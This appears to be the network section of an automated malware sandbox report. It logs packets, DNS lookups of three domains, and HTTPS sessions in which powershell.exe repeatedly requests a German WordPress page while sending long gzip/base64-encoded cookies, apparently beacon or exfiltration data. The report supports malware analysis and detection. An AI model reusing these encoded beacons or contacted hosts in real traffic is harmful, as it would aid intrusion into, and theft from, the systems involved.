                  Aug 27, 2024 22:52:48.071693897 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.071738958 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.071743965 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.071763992 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.121077061 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.144804955 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.144823074 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.145037889 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.145055056 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.145097971 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.146379948 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.146394968 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.146450996 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.146456957 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.146493912 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.146927118 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.146965981 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.147006035 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.147010088 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.147034883 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.148698092 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.148710012 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.148742914 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.148758888 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.148770094 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.148811102 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.150460958 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.150475025 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.150527000 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.150532961 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.150569916 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.151443005 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.151456118 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.151494980 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.151499987 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.151525021 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.151544094 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.152214050 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.152226925 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.152291059 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.152295113 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.152333021 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.153969049 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.153984070 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.154040098 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.154046059 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.154092073 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.233318090 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.233339071 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.233422041 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.233428001 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.233455896 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.233473063 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.234265089 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.234282970 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.234364033 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.234369040 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.234417915 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.234752893 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.234810114 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.236048937 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.236063004 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.236099958 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.236104965 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.236138105 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.236160994 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.236983061 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.236996889 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.237040997 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.237046003 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.237072945 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.237092018 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.237816095 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.237859011 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:48.237904072 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.245414972 CEST49717443192.168.2.5104.21.67.130
                  Aug 27, 2024 22:52:48.245426893 CEST44349717104.21.67.130192.168.2.5
                  Aug 27, 2024 22:52:53.150310040 CEST49718443192.168.2.5188.114.96.3
                  Aug 27, 2024 22:52:53.150341034 CEST44349718188.114.96.3192.168.2.5
                  Aug 27, 2024 22:52:53.150435925 CEST49718443192.168.2.5188.114.96.3
                  Aug 27, 2024 22:52:53.150696039 CEST49718443192.168.2.5188.114.96.3
                  Aug 27, 2024 22:52:53.150707960 CEST44349718188.114.96.3192.168.2.5
                  Aug 27, 2024 22:52:53.821275949 CEST44349718188.114.96.3192.168.2.5
                  Aug 27, 2024 22:52:53.823420048 CEST49718443192.168.2.5188.114.96.3
                  Aug 27, 2024 22:52:53.823442936 CEST44349718188.114.96.3192.168.2.5
                  Aug 27, 2024 22:52:53.938793898 CEST44349718188.114.96.3192.168.2.5
                  Aug 27, 2024 22:52:53.938863039 CEST44349718188.114.96.3192.168.2.5
                  Aug 27, 2024 22:52:53.938885927 CEST44349718188.114.96.3192.168.2.5
                  Aug 27, 2024 22:52:53.938909054 CEST44349718188.114.96.3192.168.2.5
                  Aug 27, 2024 22:52:53.938926935 CEST49718443192.168.2.5188.114.96.3
                  Aug 27, 2024 22:52:53.938930035 CEST44349718188.114.96.3192.168.2.5
                  Aug 27, 2024 22:52:53.938941002 CEST44349718188.114.96.3192.168.2.5
                  Aug 27, 2024 22:52:53.938950062 CEST49718443192.168.2.5188.114.96.3
                  Aug 27, 2024 22:52:53.938977957 CEST49718443192.168.2.5188.114.96.3
                  Aug 27, 2024 22:52:53.939071894 CEST44349718188.114.96.3192.168.2.5
                  Aug 27, 2024 22:52:53.939481974 CEST44349718188.114.96.3192.168.2.5
                  Aug 27, 2024 22:52:53.939528942 CEST49718443192.168.2.5188.114.96.3
                  Aug 27, 2024 22:52:53.939537048 CEST44349718188.114.96.3192.168.2.5
                  Aug 27, 2024 22:52:53.943528891 CEST44349718188.114.96.3192.168.2.5
                  Aug 27, 2024 22:52:53.943551064 CEST44349718188.114.96.3192.168.2.5
                  Aug 27, 2024 22:52:53.943581104 CEST49718443192.168.2.5188.114.96.3
                  Aug 27, 2024 22:52:53.943586111 CEST44349718188.114.96.3192.168.2.5
                  Aug 27, 2024 22:52:53.943629980 CEST49718443192.168.2.5188.114.96.3
                  Aug 27, 2024 22:52:54.028927088 CEST44349718188.114.96.3192.168.2.5
                  Aug 27, 2024 22:52:54.028985023 CEST44349718188.114.96.3192.168.2.5
                  Aug 27, 2024 22:52:54.029006004 CEST44349718188.114.96.3192.168.2.5
                  Aug 27, 2024 22:52:54.029040098 CEST49718443192.168.2.5188.114.96.3
                  Aug 27, 2024 22:52:54.029061079 CEST44349718188.114.96.3192.168.2.5
                  Aug 27, 2024 22:52:54.029087067 CEST44349718188.114.96.3192.168.2.5
                  Aug 27, 2024 22:52:54.029094934 CEST49718443192.168.2.5188.114.96.3
                  Aug 27, 2024 22:52:54.029128075 CEST49718443192.168.2.5188.114.96.3
                  Aug 27, 2024 22:52:54.029556036 CEST49718443192.168.2.5188.114.96.3

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Aug 27, 2024 22:52:09.519843102 CEST6446953192.168.2.51.1.1.1
                  Aug 27, 2024 22:52:09.547665119 CEST53644691.1.1.1192.168.2.5
                  Aug 27, 2024 22:52:31.934988976 CEST5646953192.168.2.51.1.1.1
                  Aug 27, 2024 22:52:32.121295929 CEST53564691.1.1.1192.168.2.5
                  Aug 27, 2024 22:52:46.047743082 CEST5800853192.168.2.51.1.1.1
                  Aug 27, 2024 22:52:46.084126949 CEST53580081.1.1.1192.168.2.5

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Aug 27, 2024 22:52:09.519843102 CEST192.168.2.51.1.1.10x913bStandard query (0)www.shamara.deA (IP address)IN (0x0001)false
                  Aug 27, 2024 22:52:31.934988976 CEST192.168.2.51.1.1.10x2faStandard query (0)ipacrack.comA (IP address)IN (0x0001)false
                  Aug 27, 2024 22:52:46.047743082 CEST192.168.2.51.1.1.10x1a98Standard query (0)ellinikiaktoploia.netA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Aug 27, 2024 22:52:09.547665119 CEST1.1.1.1192.168.2.50x913bNo error (0)www.shamara.de109.237.132.6A (IP address)IN (0x0001)false
                  Aug 27, 2024 22:52:32.121295929 CEST1.1.1.1192.168.2.50x2faNo error (0)ipacrack.com188.114.96.3A (IP address)IN (0x0001)false
                  Aug 27, 2024 22:52:32.121295929 CEST1.1.1.1192.168.2.50x2faNo error (0)ipacrack.com188.114.97.3A (IP address)IN (0x0001)false
                  Aug 27, 2024 22:52:46.084126949 CEST1.1.1.1192.168.2.50x1a98No error (0)ellinikiaktoploia.net104.21.67.130A (IP address)IN (0x0001)false
                  Aug 27, 2024 22:52:46.084126949 CEST1.1.1.1192.168.2.50x1a98No error (0)ellinikiaktoploia.net172.67.175.162A (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • www.shamara.de
                  • ipacrack.com
                  • ellinikiaktoploia.net

                  HTTPS Proxied Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.549713109.237.132.64435952C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  2024-08-27 20:52:11 UTC2153OUTGET / HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                  Cookie: 6F48217DA8=H4sIAAAAAAAEAI1U0W6bMBT9FfO2SRtqkwhFy5MDJvGEMbIh6QMiYolTIQFGQNdW4uNnk7CQpUr3AMLnnHu59/rY0PMijhgPGHWxhxL7RxzU8rlOCydt086AQeDAEGo8akTdxGl+lGUTw6rSgpjJtMjK586wZVHI8hzrZrloRrlAD8QnzWnxUcSXt7n19SYM9PC94K01m04+/R0lQRQi5kOCEui51OffA7vPxCux1+HbrDzI1yZu3ptWFNNJvC8OpngTneHU2W9R647HOj7oTnQTX2SdsaYEOQxv9ExPqwCG6+RqjJ3hURt6nw3Zk/s019qVKhqxDWJJHI9a8COyRGxH3Z3aRhtxThlPJp1BS9FXdJN4IJSEJ+dudn7YGbpE9BQmpprWwkRPaGEuYbgwbeIszM2S65fCfnL9qI8td/VrvTAJt5Us8FSOoYYdZPYah8gOI6ZGThxrNmaxg/wQu1h1g8tW5NYMuMpM+TuwAJEHkYPH2RTwVlSVchiYfwMrUb5kpejV40we2iAvscYQQxvMMfWT+fFhroiLp28sftez1/Q9g/5VfuxGRUdLD9uXvQhefuXZvjNOLho2algzKduR1zojRCS475A4FEWlhP+p0+feoQRif3wcLuiOUUiwvxquhn9E/TkabKyB0RVy7fFX1UJWXzVD+ZbghGT7Wjby2IIzAR4fgJraH3HSkN+VBAAA; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+RvUlNba+1u0lT5MPjNMAP8se+ZmZnXaXknenEYdxSF+AZWbLqRuvQDlkZjKdbxzAxlyB9wJiV7XhFWu9XgL2ErGBOHgkoqx6jWJrW2Xau2/qdv16bj/Tyqd2TzaqxHrLy3C2yLQSk612NIREwu2XFW987A3Vxdz7gfiydhBcgPoH3We1hcCx0LdkYxQV4IDwvizV0ZE5VSlkx0FQkir4eKPwBFoHNnIAcRPNzMLvVKYeOhA0 [TRUNCATED]
                  Host: www.shamara.de
                  Connection: Close
                  2024-08-27 20:52:11 UTC602INHTTP/1.1 200 OK
                  Date: Tue, 27 Aug 2024 20:52:11 GMT
                  Server: Apache
                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                  Cache-Control: no-store, no-cache, must-revalidate
                  Pragma: no-cache
                  Link: <https://www.shamara.de/wp-json/>; rel="https://api.w.org/", <https://www.shamara.de/wp-json/wp/v2/pages/237>; rel="alternate"; type="application/json", <https://www.shamara.de/>; rel=shortlink
                  Set-Cookie: PHPSESSID=cf6dcf35eb1e6e697c667da8e67c3952; path=/
                  Vary: Accept-Encoding
                  Strict-Transport-Security: max-age=31556926
                  Connection: close
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  2024-08-27 20:52:11 UTC6INData Raw: 61 34 62 31 0d 0a
                  Data Ascii: a4b1
                  2024-08-27 20:52:11 UTC7632INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 5f 73 74 72 65 74 63 68 65 64 20 72 65 73 70 6f 6e 73 69 76 65 20 61 76 2d 70 72 65 6c 6f 61 64 65 72 2d 64 69 73 61 62 6c 65 64 20 61 76 2d 64 65 66 61 75 6c 74 2d 6c 69 67 68 74 62 6f 78 20 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 74 6f 70 20 68 74 6d 6c 5f 6c 6f 67 6f 5f 63 65 6e 74 65 72 20 68 74 6d 6c 5f 62 6f 74 74 6f 6d 5f 6e 61 76 5f 68 65 61 64 65 72 20 68 74 6d 6c 5f 6d 65 6e 75 5f 72 69 67 68 74 20 68 74 6d 6c 5f 73 6c 69 6d 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 74 69 63 6b 79 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 68 72 69 6e 6b 69 6e 67 5f 64 69 73 61 62 6c 65 64 20 68 74 6d 6c 5f 6d 6f 62 69 6c 65 5f
                  Data Ascii: <!DOCTYPE html><html lang="de-DE" class="html_stretched responsive av-preloader-disabled av-default-lightbox html_header_top html_logo_center html_bottom_nav_header html_menu_right html_slim html_header_sticky html_header_shrinking_disabled html_mobile_
                  2024-08-27 20:52:11 UTC112INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 5a 65 6e
                  Data Ascii: <link rel="profile" href="http://gmpg.org/xfn/11" /><link rel="alternate" type="application/rss+xml" title="Zen
                  2024-08-27 20:52:11 UTC8192INData Raw: 74 72 75 6d 20 66 c3 bc 72 20 45 6e 65 72 67 65 74 69 73 63 68 65 20 48 65 69 6c 77 65 69 73 65 6e 20 52 53 53 32 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 68 61 6d 61 72 61 2e 64 65 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 68 61 6d 61 72 61 2e 64 65 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 68 61 6d 61 72 61 2e 64 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 65 6e 66 6f 6c 64 2f 6a 73 2f 68 74 6d 6c 35 73 68 69 76 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 21
                  Data Ascii: trum fr Energetische Heilweisen RSS2 Feed" href="https://www.shamara.de/feed/" /><link rel="pingback" href="https://www.shamara.de/xmlrpc.php" />...[if lt IE 9]><script src="https://www.shamara.de/wp-content/themes/enfold/js/html5shiv.js"></script><!
                  2024-08-27 20:52:11 UTC8192INData Raw: 65 72 2d 65 69 6e 73 74 65 69 67 65 72 2f 22 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 76 69 61 2d 62 75 6c 6c 65 74 22 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 76 69 61 2d 6d 65 6e 75 2d 74 65 78 74 22 3e 50 65 6e 64 65 6c 6e 20 66 c3 bc 72 20 45 69 6e 73 74 65 69 67 65 72 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 37 35 33 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 68 61 6d 61 72 61 2e 64 65 2f 73
                  Data Ascii: er-einsteiger/" itemprop="url"><span class="avia-bullet"></span><span class="avia-menu-text">Pendeln fr Einsteiger</span></a></li><li id="menu-item-753" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.shamara.de/s
                  2024-08-27 20:52:11 UTC8192INData Raw: 6e 64 65 6e 3f 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 22 3e 4d c3 b6 63 68 74 65 73 74 20 44 75 20 44 65 69 6e 20 4c 65 62 65 6e 20 69 6e 20 64 69 65 20 65 69 67 6e 65 6e 65 6e 20 48 c3 a4 6e 64 65 20 6e 65 68 6d 65 6e 3f 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 22 3e 4d c3 b6 63 68 74 65 73 74 20 44 75 20 61 6e 20 4b c3 b6 72 70 65 72 2c 20 53 65 65 6c 65 20 75 6e 64 20 47 65 69 73 74 20 48 65 69 6c 75 6e 67 20 65 72 66 61 68 72 65 6e 3f 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 73 65 63 74 69 6f 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 5f 63 6f 6c 75 6d 6e 20 61 76 5f 6f 6e 65 5f 68 61 6c 66 20 20 61 76 2d 61
                  Data Ascii: nden?</p><p style="text-align: right;">Mchtest Du Dein Leben in die eignenen Hnde nehmen?</p><p style="text-align: right;">Mchtest Du an Krper, Seele und Geist Heilung erfahren?</p></div></section></div><div class="flex_column av_one_half av-a
                  2024-08-27 20:52:11 UTC4816INData Raw: 6f 70 65 3d 22 69 74 65 6d 73 63 6f 70 65 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 50 46 6f 6f 74 65 72 22 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 27 63 6f 6e 74 61 69 6e 65 72 27 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 63 6f 70 79 72 69 67 68 74 27 3e 26 63 6f 70 79 3b 20 43 6f 70 79 72 69 67 68 74 20 20 2d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 68 61 6d 61 72 61 2e 64 65 2f 27 3e 5a 65 6e 74 72 75 6d 20 66 c3 bc 72 20 45 6e 65 72 67 65 74 69 73 63 68 65 20 48 65 69 6c 77 65 69 73 65 6e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 0a 20 20
                  Data Ascii: ope="itemscope" itemtype="https://schema.org/WPFooter" > <div class='container'> <span class='copyright'>&copy; Copyright - <a href='https://www.shamara.de/'>Zentrum fr Energetische Heilweisen</a></span>
                  2024-08-27 20:52:11 UTC5025INData Raw: 73 63 72 69 70 74 3e 0a 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 0a 20 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 20 20 0a 76 61 72 20 61 76 69 61 5f 66 72 61 6d 65 77 6f 72 6b 5f 67 6c 6f 62 61 6c 73 20 3d 20 61 76 69 61 5f 66 72 61 6d 65 77 6f 72 6b 5f 67 6c 6f 62 61 6c 73 20 7c 7c 20 7b 7d 3b 0a 20 20 20 20 61 76 69 61 5f 66 72 61 6d 65 77 6f 72 6b 5f 67 6c 6f 62 61 6c 73 2e 66 72 61 6d 65 77 6f 72 6b 55 72 6c 20 3d 20 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 68 61 6d 61 72 61 2e 64 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 65 6e 66 6f 6c 64 2f 66 72 61 6d 65 77 6f 72 6b 2f 27 3b 0a 20 20 20 20 61 76 69 61 5f 66 72 61 6d 65 77 6f 72 6b 5f 67 6c 6f 62 61 6c 73 2e 69 6e 73 74 61
                  Data Ascii: script> <script type='text/javascript'> /* <![CDATA[ */ var avia_framework_globals = avia_framework_globals || {}; avia_framework_globals.frameworkUrl = 'https://www.shamara.de/wp-content/themes/enfold/framework/'; avia_framework_globals.insta
                  2024-08-27 20:52:11 UTC2INData Raw: 0d 0a
                  Data Ascii:
                  2024-08-27 20:52:11 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.549715109.237.132.64435796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  2024-08-27 20:52:25 UTC2149OUTGET / HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                  Cookie: 6F48217DA8=H4sIAAAAAAAEAI1U0W6bMBT9FfO2SRtqkwhFy5MDJvGEMbIh6QMiYolTIQFGQNdW4uNnk7CQpUr3AMLnnHu59/rY0PMijhgPGHWxhxL7RxzU8rlOCydt086AQeDAEGo8akTdxGl+lGUTw6rSgpjJtMjK586wZVHI8hzrZrloRrlAD8QnzWnxUcSXt7n19SYM9PC94K01m04+/R0lQRQi5kOCEui51OffA7vPxCux1+HbrDzI1yZu3ptWFNNJvC8OpngTneHU2W9R647HOj7oTnQTX2SdsaYEOQxv9ExPqwCG6+RqjJ3hURt6nw3Zk/s019qVKhqxDWJJHI9a8COyRGxH3Z3aRhtxThlPJp1BS9FXdJN4IJSEJ+dudn7YGbpE9BQmpprWwkRPaGEuYbgwbeIszM2S65fCfnL9qI8td/VrvTAJt5Us8FSOoYYdZPYah8gOI6ZGThxrNmaxg/wQu1h1g8tW5NYMuMpM+TuwAJEHkYPH2RTwVlSVchiYfwMrUb5kpejV40we2iAvscYQQxvMMfWT+fFhroiLp28sftez1/Q9g/5VfuxGRUdLD9uXvQhefuXZvjNOLho2algzKduR1zojRCS475A4FEWlhP+p0+feoQRif3wcLuiOUUiwvxquhn9E/TkabKyB0RVy7fFX1UJWXzVD+ZbghGT7Wjby2IIzAR4fgJraH3HSkN+VBAAA; 6F48217DA81=H4sIAAAAAAAEAGVQW07DMBC8Cr4AdwihhYAiqrpSBX+WvUlNba+166Qp8uGxG+AH+WNfM7OzbmJ0VqtkMWxJeXhGTlmoyVg0YxYaw+nW0UzMJaTBY8jCKF6RxrkVYC4+C1iiQwLKYsCQDM3rbLu0ffvOX6/dR3z5lPbJZNEZB1k4VlW2B490vWvRRwJmW1e8DYPV0BZ35wPup9KJeAHiEziXxR5Gy4muJZtCsh4eCM91sQRF+tTEmAUDzUWi6MuR/B+gCmyWCGQh6J+D2a5O2StKrAk [TRUNCATED]
                  Host: www.shamara.de
                  Connection: Close
                  2024-08-27 20:52:25 UTC602INHTTP/1.1 200 OK
                  Date: Tue, 27 Aug 2024 20:52:25 GMT
                  Server: Apache
                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                  Cache-Control: no-store, no-cache, must-revalidate
                  Pragma: no-cache
                  Link: <https://www.shamara.de/wp-json/>; rel="https://api.w.org/", <https://www.shamara.de/wp-json/wp/v2/pages/237>; rel="alternate"; type="application/json", <https://www.shamara.de/>; rel=shortlink
                  Set-Cookie: PHPSESSID=da14992338b8a467b3b7887146bb12b4; path=/
                  Vary: Accept-Encoding
                  Strict-Transport-Security: max-age=31556926
                  Connection: close
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  2024-08-27 20:52:25 UTC6INData Raw: 61 34 62 31 0d 0a
                  Data Ascii: a4b1
                  2024-08-27 20:52:25 UTC7632INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 5f 73 74 72 65 74 63 68 65 64 20 72 65 73 70 6f 6e 73 69 76 65 20 61 76 2d 70 72 65 6c 6f 61 64 65 72 2d 64 69 73 61 62 6c 65 64 20 61 76 2d 64 65 66 61 75 6c 74 2d 6c 69 67 68 74 62 6f 78 20 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 74 6f 70 20 68 74 6d 6c 5f 6c 6f 67 6f 5f 63 65 6e 74 65 72 20 68 74 6d 6c 5f 62 6f 74 74 6f 6d 5f 6e 61 76 5f 68 65 61 64 65 72 20 68 74 6d 6c 5f 6d 65 6e 75 5f 72 69 67 68 74 20 68 74 6d 6c 5f 73 6c 69 6d 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 74 69 63 6b 79 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 68 72 69 6e 6b 69 6e 67 5f 64 69 73 61 62 6c 65 64 20 68 74 6d 6c 5f 6d 6f 62 69 6c 65 5f
                  Data Ascii: <!DOCTYPE html><html lang="de-DE" class="html_stretched responsive av-preloader-disabled av-default-lightbox html_header_top html_logo_center html_bottom_nav_header html_menu_right html_slim html_header_sticky html_header_shrinking_disabled html_mobile_
